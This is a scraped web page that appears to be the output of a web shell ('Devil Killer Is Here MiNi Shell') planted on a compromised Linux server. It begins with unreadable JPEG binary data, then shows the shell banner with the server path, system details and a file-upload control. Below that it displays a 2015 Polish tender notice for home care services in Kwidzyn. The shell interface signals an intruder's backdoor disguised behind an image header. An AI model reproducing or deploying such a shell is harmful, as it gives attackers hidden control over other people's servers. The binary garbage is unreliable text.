JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151006/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151006/262742-N-2015.html

<p class="kh_header"><b>Kwidzyn: Świadczeniu usług opiekuńczych w miejscu zamieszkania dla świadczeniobiorców MOPS w Kwidzynie</b><br>
<b>Numer ogłoszenia: 262742 - 2015; data zamieszczenia: 06.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Kwidzynie , ul. Grudziądzka 6, 82-500 Kwidzyn, woj. pomorskie, tel. 055 6461626, faks 055 6461626.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://mops.kwidzyn.samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczeniu usług opiekuńczych w miejscu zamieszkania dla świadczeniobiorców MOPS w Kwidzynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług polegających na Świadczeniu usług opiekuńczych w miejscu zamieszkania dla świadczeniobiorców MOPS w Kwidzynie 
1.Usługi opiekuńcze świadczone będą w miejscu zamieszkania osób objętych wsparciem MOPS w Kwidzynie, zwanych dalej świadczeniobiorcami.
2.Średnia miesięczna szacunkowa liczba świadczeniobiorców wynosić będzie 135 osób. Usługi opiekuńcze mogą być świadczone w dni robocze oraz dni ustawowo wolne od pracy wg wydanych decyzji administracyjnych.
3. Szacunkowa liczba godzin miesięcznie wynosić będzie - 6 600 
Ze względu na specyfikę przedmiotu zamówienia faktyczna liczba osób, którym świadczone będą usługi opiekuńcze i faktyczna liczba godzin świadczenia usług miesięcznie będzie uzależniona od rzeczywistej liczby osób, które wymagają pomocy w formie usług opiekuńczych (liczba osób i godzin może ulec zmniejszeniu lub zwiększeniu).
Zamawiający zastrzega sobie prawo niewyczerpania całego zakresu przedmiotu zamówienia.    
4. Przedmiot zamówienia obejmuje :
Zgodnie z art. 50 ustawy o pomocy społecznej (Dz.U.2015.163  ze zm.) osobie samotnej, która z powodu wieku, choroby lub innych przyczyn wymaga pomocy innych osób a jest jej pozbawiona przysługuje pomoc w formie usług opiekuńczych lub specjalistycznych usług opiekuńczych.
Zamawiający informuje, że zgodnie z obowiązującymi przepisami pomoc 
w formie usług opiekuńczych przysługuje :
1) osobom samotnym, które z powodu wieku, choroby lub innych przyczyn wymagają pomocy innych osób a są jej pozbawione,
2) osobom, które wymagają pomocy innych osób a rodzina nie może takiej pomocy zapewnić.  
Zgodnie z ustawą o pomocy społecznej zakres usług opiekuńczych obejmuje     w szczególności :     
Pomoc w zaspokajaniu codziennych potrzeb życiowych:utrzymanie czystości w pomieszczeniach użytkowanych przez świadczeniobiorcę  oraz czystości sprzętu sanitarnego i urządzeń sanitarnych, zapewnienie bezpiecznego otoczenia do poruszania się,  utrzymanie w czystości naczyń stołowych, kuchennych i innego sprzętu gospodarstwa domowego użytkowanego przez świadczeniobiorcę, dbanie  o higienę żywności,  drobne przepierki i zmiany bielizny pościelowej lub zanoszenie bielizny do pralni, prasowanie odzieży, dokonywanie zakupów, pomoc przy sporządzaniu listy zakupów, informowanie o cenach towarów, przygotowanie posiłków z uwzględnieniem diet (w tym co najmniej jednego gorącego posiłku), karmienie,  na wniosek świadczeniobiorcy lub Zamawiającego dostarczanie 1 gorącego posiłku dziennie z placówki gastronomicznej wskazanej przez Zamawiającego lub świadczeniobiorcę,  pomoc przy spożywaniu posiłków, palenie w piecu, przynoszenie węgla, wody, mycie okien przynajmniej 2 razy 
w roku, załatwianie spraw urzędowych, opłacanie rachunków, rzetelne i terminowe rozliczenie się z wydatkowanych środków, pomoc w samoobsłudze. 
Opieka higieniczna  
mycie, czesanie i ubieranie z uwzględnieniem problemów utrzymania higieny    w załatwianiu potrzeb fizjologicznych, pomoc przy załatwianiu potrzeb fizjologicznych ( w tym zmiana pieluch), poranna i wieczorna toaleta w łóżku, dbanie o higienę paznokci kończyn górnych i dolnych,  golenie, kąpanie, przesłanie łóżka,  układanie chorego w łóżku, zmiana pozycji chorego w łóżku, zapobieganie powstawaniu odleżyn i odparzeń.
Pielęgnacja zalecana przez lekarza 
podawanie leków, mierzenie temperatury, pomiary tętna i ciśnienia, zakładanie kompresów i okładów, zmiana opatrunków, wzywanie lekarza w sytuacjach wymagających nagłych interwencji, zamawianie planowanych wizyt lekarskich, wizyty lekarskie w przychodni, udział w zabiegach specjalistycznych, realizacja recept, iniekcja insuliny, prowadzenie działań w celu zapobiegania powikłaniom wynikającym z unieruchomienia, prowadzenie usprawniania ruchowego (siadanie, pionizacja, nauka chodzenia, nauka samoobsługi), wykonywanie wszelkich innych czynności niezbędnych do prowadzenia prawidłowej pielęgnacji w razie potrzeby wykonywanie wszelkich czynności mających na celu ochronę zdrowia bądź ratowania życia. 
W miarę możliwości zapewnienie kontaktów z otoczeniem organizowanie spacerów, podtrzymywanie kontaktów ze środowiskiem,  czytanie, prowadzenie rozmów.
5. Usługi świadczone będą  w oparciu o indywidualne decyzje administracyjne wydane przez Zamawiającego na podstawie ustawy o pomocy społecznej.  Wydane decyzje zawierały będą :
1) imię, nazwisko i adres świadczeniobiorcy;
2) rodzaj usług wraz z ich szczegółowym zakresem;
3) wymiar dzienny świadczonych usług, ilość dni w tygodniu i łączną ilość godzin w miesiącu;
4) okres, przez który usługi mają być świadczone (termin rozpoczęcia              i zakończenia świadczenia usług);
5) określoną procentowo i kwotowo odpłatność świadczeniobiorcy za usługi opiekuńcze zgodnie z Uchwałą Nr XXV/201/04 Rady Miejskiej w Kwidzynie 
z dnia 28 października 2004 roku w sprawie szczegółowych warunków przyznawania i odpłatności za usługi opiekuńcze i specjalistyczne usługi opiekuńcze z wyłączeniem specjalistycznych usług opiekuńczych dla osób 
z zaburzeniami psychicznymi oraz częściowego lub całkowitego zwolnienia        z odpłatności oraz trybu ich pobierania.  
6. Zamawiający wymaga, aby 50 % osób wykazanych w załączniku Nr 4 (wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia) były zatrudnione na umowę o pracę przez Wykonawcę albo podwykonawcę. Osoby zatrudnione na umowę o pracę winny wykonywać główne czynności związane 
z realizacją usług opiekuńczych (pomoc w zaspokajaniu codziennych czynności życiowych, opieka higieniczna, pielęgnacja zalecana przez lekarza, zapewnianie kontaktów z otoczeniem, nadzór i organizacja usług opiekuńczych, ustalanie 
harmonogramu pracy opiekunek). Zawsze podczas realizacji zamówienia 50% osób, które świadczą usługi opiekuńcze muszą być zatrudnione na umowę        o pracę.       
III. Postanowienia ogólne 
1. Usługi świadczone będą w oparciu o indywidualne decyzje administracyjne wystawione przez Miejski Ośrodek Pomocy Społecznej w Kwidzynie zawierające: imię, nazwisko, adres świadczeniobiorcy, rodzaj usług wraz z ich szczegółowym zakresem, wymiar dzienny świadczonych usług, ilość dni            w tygodniu liczbę zaplanowanych godzin w miesiącu, termin rozpoczęcia i zakończenia usług, odpłatność procentową i kwotową za wykonane usługi. 
Usługi opiekuńcze mogą być świadczone w dni robocze oraz dni ustawowo wolne od pracy wg wydanych decyzji administracyjnych.
2. Zamawiający zastrzega sobie prawo kontroli jakości świadczonych usług oraz zgodności ich wykonywania z umową i wymaganiami zawartymi w niniejszej specyfikacji.
3. Wykonawca zobowiązany będzie niezwłocznie informować Zamawiającego, o każdej zmianie sytuacji życiowej i zdrowotnej osoby korzystającej z usług, która ma lub mogłaby mieć wpływ na ich realizację. 
4. Pracownicy Wykonawcy będą prowadzić karty pracy, które po każdej wizycie opiekunki będą podpisane przez świadczeniobiorcę. 
5. Przechowywane karty pracy przez Wykonawcę będą niezwłocznie udostępniane na żądanie Zamawiającego. 
6.Na każde żądanie Zamawiającego Wykonawca przedstawi miesięczny harmonogram pracy w środowisku. 
7. Rozliczenie usług następować będzie co miesiąc, w terminie do 5 dnia następnego miesiąca.
Wykonawca przedstawi Zamawiającemu:
- imienne rozliczenie wykonanych usług opiekuńczych (wykaz osób objętych usługami, nr decyzji, liczbę zaplanowanych godzin w miesiącu  w tym płatnych i bezpłatnych, liczbę faktycznie wykonanych godzin, godziny do zapłaty,  odpłatność za godzinę podaną w złotych, opłatę za miesiąc poszczególnych świadczeniobiorców).  
8. Wykonawca winien zapewnić biuro obsługi z dostępem do telefonu czynne w dni robocze w godzinach od 7.00 do 15.00 na terenie miasta Kwidzyn najpóźniej do dnia podpisania umowy o realizację przedmiotu zamówienia. W przypadku podpisania umowy przed  1 stycznia 2016 r. wymaga się, aby biuro czynne było przynajmniej na 5 dni roboczych przed rozpoczęciem realizacji zamówienia, tj. przed 01.01.2016 r...</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.11.00-3, 85.31.11.20-4, 85.31.21.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się  Wykonawcy, którzy spełniają warunki określone przez Zamawiającego, na podstawie art. 22 ust. 1 ustawy prawo zamówień publicznych oraz Wykonawcy, wobec których istnieje brak podstaw do  wykluczenia Wykonawcy z powodu niespełniania warunków,          o których mowa w art. 24 ust 1 ustawy prawo zamówień publicznych.
Warunek dotyczący posiadania wiedzy i doświadczenia będzie uznany za spełniony jeżeli Wykonawca wykaże, że wykonał, lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej 1 usługę  opiekuńczą , w rozumieniu ustawy o pomocy społecznej (Dz. U. z 2015 r. poz. 163 ze zmianami), o wartości minimum 600.000,00 zł brutto ( Zał. Nr 3 do formularza oferty). W przypadku świadczeń okresowych lub ciągłych wartość części zamówienia zrealizowanej do upływu terminu składania ofert musi spełniać wymogi określone przez Zamawiającego.
Ocena spełniania  warunków dokonana zostanie na podstawie dokumentów załączonych do oferty, w oparciu o dyspozycje zawarte w dziale VI SIWZ, w szczególności : czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony został w okresie ustalonym przez prawo (nie wcześniej niż ), zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest Wykonawca uczestniczący w przedmiotowym postępowaniu, czy kserokopia załączona w miejsce oryginału została potwierdzona za zgodność z oryginałem przez osoby uprawnione, czy złożony dokument jest kompletny. 
5) Niespełnienie warunku udziału w przetargu stanowi podstawę do      wykluczenia Wykonawcy i  uznania jego oferty za odrzuconą.
W celu potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawca składa wraz z ofertą następujące dokumenty:
1) Załącznik Nr 1 - oświadczenie o spełnianiu warunków udziału w niniejszym postępowaniu  zgodnie z art. 22 ust. 1 ustawy Pzp,
2) W celu wykazania spełniania przez Wykonawcę warunku dotyczącego wiedzy i doświadczenia Wykonawca składa wraz z ofertą - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług opiekuńczych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania             i podmiotów na rzecz, których usługi zostały wykonane wraz z załączeniem dowodów czy zostały wykonane lub są wykonywane należycie. Dowodami są poświadczenia z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. ( Zał. Nr 3 do formularza oferty).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia, będzie uznany za spełniony jeżeli Wykonawca wykaże, że dysponuje minimum 42 osobami,
z których każda posiada co najmniej miesięczne doświadczenie w realizacji usług opiekuńczych. Przez pojęcie doświadczenie w realizacji usług opiekuńczych Zamawiający rozumie umiejętności wykonywania tych usług zdobyte i ugruntowane w trakcie faktycznego ich wykonywania, w różnych formach prawnych np. umowa o pracę, umowa o dzieło, umowa zlecenie, wolontariat, praktyka i inne ( Zał. Nr 4 do formularza oferty). 
 Ocena spełniania  warunków dokonana zostanie na podstawie dokumentów załączonych do oferty, w oparciu o dyspozycje zawarte w dziale VI SIWZ, w szczególności : czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony został w okresie ustalonym przez prawo (nie wcześniej niż ), zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest Wykonawca uczestniczący w przedmiotowym postępowaniu, czy kserokopia załączona w miejsce oryginału została potwierdzona za zgodność z oryginałem przez osoby uprawnione, czy złożony dokument jest kompletny. 
W celu wykazania spełnienia przez Wykonawcę warunku dotyczącego dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, Wykonawca składa wraz z ofertą wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności osób odpowiedzialnych za świadczenie usług, wraz z informacją na temat ich doświadczenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz z informacją o podstawie do dysponowania tymi osobami. (Zał. Nr 4 ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej będzie uznany za spełniony jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej  z przedmiotem zamówienia, na sumę ubezpieczenia nie niższą niż 150.000 zł  
Ocena spełniania  warunków dokonana zostanie na podstawie dokumentów załączonych do oferty, w oparciu o dyspozycje zawarte w dziale VI SIWZ, w szczególności : czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony został w okresie ustalonym przez prawo (nie wcześniej niż ), zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest Wykonawca uczestniczący w przedmiotowym postępowaniu, czy kserokopia załączona w miejsce oryginału została potwierdzona za zgodność z oryginałem przez osoby uprawnione, czy złożony dokument jest kompletny. 
Niespełnienie warunku udziału w przetargu stanowi podstawę do      wykluczenia Wykonawcy i  uznania jego oferty za odrzuconą.
W celu wykazania spełnienia przez Wykonawcę warunku dotyczącego sytuacji ekonomicznej i finansowej, Wykonawca składa wraz z ofertą opłaconą polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Jeżeli termin zapłaty składki ubezpieczeniowej nie wynika z treści polisy wykonawca wraz z polisą składa inny dokument potwierdzający zapłatę składki ubezpieczeniowej (np. przelew).
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków na zasadach określonych w art.26 ust.2b ustawy Pzp. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Dokument powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia wykonawcy ubiegającemu się 
o zamówienie odpowiedniego zasobu oraz powinien zawierać w szczególności: zakres dostępnych wykonawcy zasobów innego podmiotu, sposób wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu  zamówienia, charakter stosunku jaki będzie łączył wykonawcę z innymi podmiotami, zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.  
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art.26 ust.2b ustawy odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

